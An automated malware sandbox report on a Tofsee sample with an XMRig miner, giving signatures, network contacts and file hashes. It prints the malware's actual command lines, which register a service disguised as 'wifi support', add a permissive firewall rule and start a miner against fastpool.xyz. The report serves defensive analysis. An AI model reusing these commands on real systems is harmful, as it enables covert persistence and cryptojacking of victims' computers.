Analysis Overview
SHA256
d67fc64d34afd907136004df31bd8c6309f4904094fce34e873fa361ac76e0dd
Threat Level: Known bad
The file 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.zip was found to be: Known bad.
Malicious Activity Summary
Tofsee
xmrig
XMRig Miner payload
Creates new service(s)
Modifies Windows Firewall
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-19 23:50
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-19 23:50
Reported
2023-11-19 23:55
Platform
win7-20231020-en
Max time kernel
5s
Max time network
162s
Command Line
Signatures
Tofsee
xmrig
XMRig Miner payload
Creates new service(s)
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2216 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2216 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2216 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2216 wrote to memory of 2324 | N/A | C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\permvqxi\
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe" C:\Windows\SysWOW64\permvqxi\
C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create permvqxi binPath= "C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d\"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe\"" type= own start= auto DisplayName= "wifi support"
C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description permvqxi "wifi internet conection"
C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start permvqxi
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe
C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"
C:\Windows\SysWOW64\svchost.exe
svchost.exe
C:\Windows\SysWOW64\svchost.exe
svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.200000 -p x -k -a cn/half --cpu-priority 1
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | microsoft.com | udp |
| US | 20.112.250.133:80 | microsoft.com | tcp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| US | 8.8.8.8:53 | microsoft-com.mail.protection.outlook.com | udp |
| US | 52.101.8.49:25 | microsoft-com.mail.protection.outlook.com | tcp |
| US | 8.8.8.8:53 | vanaheim.cn | udp |
| RU | 158.160.73.47:443 | vanaheim.cn | tcp |
| RU | 80.66.75.77:483 | | tcp |
| US | 8.8.8.8:53 | 13.71.61.154.dnsbl.sorbs.net | udp |
| US | 8.8.8.8:53 | 13.71.61.154.bl.spamcop.net | udp |
| US | 8.8.8.8:53 | 13.71.61.154.zen.spamhaus.org | udp |
| US | 8.8.8.8:53 | 13.71.61.154.sbl-xbl.spamhaus.org | udp |
| US | 8.8.8.8:53 | 13.71.61.154.cbl.abuseat.org | udp |
| US | 8.8.8.8:53 | yahoo.com | udp |
| US | 8.8.8.8:53 | mta5.am0.yahoodns.net | udp |
| US | 98.136.96.74:25 | mta5.am0.yahoodns.net | tcp |
| RU | 62.122.184.92:427 | | tcp |
| UA | 45.143.201.238:427 | | tcp |
| RU | 176.113.115.84:427 | | tcp |
| RU | 80.66.75.4:427 | | tcp |
| RU | 176.113.115.135:427 | | tcp |
| RU | 176.113.115.136:427 | | tcp |
| N/A | 83.97.73.44:427 | | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| NL | 142.251.39.100:80 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.ru | udp |
| NL | 142.251.36.35:443 | www.google.ru | tcp |
| US | 8.8.8.8:53 | oauth.vk.com | udp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| FR | 52.98.228.34:993 | | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | smtp.google.com | udp |
| NL | 142.250.102.26:25 | smtp.google.com | tcp |
| US | 8.8.8.8:53 | fastpool.xyz | udp |
| BG | 213.91.128.133:10060 | fastpool.xyz | tcp |
| US | 8.8.8.8:53 | work.a-poster.info | udp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| US | 8.8.8.8:53 | mail.ru | udp |
| US | 8.8.8.8:53 | mxs.mail.ru | udp |
| RU | 217.69.139.150:25 | mxs.mail.ru | tcp |
| US | 8.8.8.8:53 | api.luisaviaroma.com | udp |
| NL | 104.110.240.155:443 | api.luisaviaroma.com | tcp |
| LT | 93.115.25.10:80 | 93.115.25.10 | tcp |
| RU | 80.66.75.77:483 | | tcp |
| US | 8.8.8.8:53 | 13.71.61.154.in-addr.arpa | udp |
| LT | 93.115.25.73:80 | 93.115.25.73 | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| LT | 93.115.25.13:80 | 93.115.25.13 | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| US | 8.8.8.8:53 | www.sivasdescalzo.com | udp |
| US | 104.18.232.222:443 | www.sivasdescalzo.com | tcp |
| US | 104.18.232.222:443 | www.sivasdescalzo.com | tcp |
| US | 8.8.8.8:53 | registrierung.web.de | udp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| RU | 87.240.129.181:443 | oauth.vk.com | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
| DE | 217.72.199.5:443 | registrierung.web.de | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe
| Hash | Value |
| --- | --- |
| MD5 | 41e5c245a82a8504a70527e839ae883e |
| SHA1 | 080f8d3a98ac6769752e221403d17354a4afa0b5 |
| SHA256 | 51fd31d38d471d045b16fd4b4fedc2cd52aedfe29845cc212e8d61bf5758e746 |
| SHA512 | b281798cb0e3cf7c7bcf001dc7ff8f5f10af5e3b6c6ac12d286a0d07fb9e7d718c8b2c4e5f32df7fd50f4e7de92e1eefd353f7cb5a6b4d537dfae67648188b69 |
C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe
| Hash | Value |
| --- | --- |
| MD5 | 9bbc5d1f6be289e2071874e4a8e1815a |
| SHA1 | 362815bd2e08ecca3f49caa89dc21b2fbd104dcf |
| SHA256 | c0ae437eaa40a777b2087deaadd1fabe001c2fc6208f54033b7eaa39847a3847 |
| SHA512 | fce8a86aaa9284f5edc42a69af9ca3bcaaa3b524877b13a55705f330876f5c0871f46fd216aef955f541ac231379af2866ae8eca7805fb8c03114b7991aac525 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-19 23:50
Reported
2023-11-19 23:55
Platform
win10v2004-20231023-en
Max time kernel
132s
Max time network
157s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.254.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.240.110.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.254.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |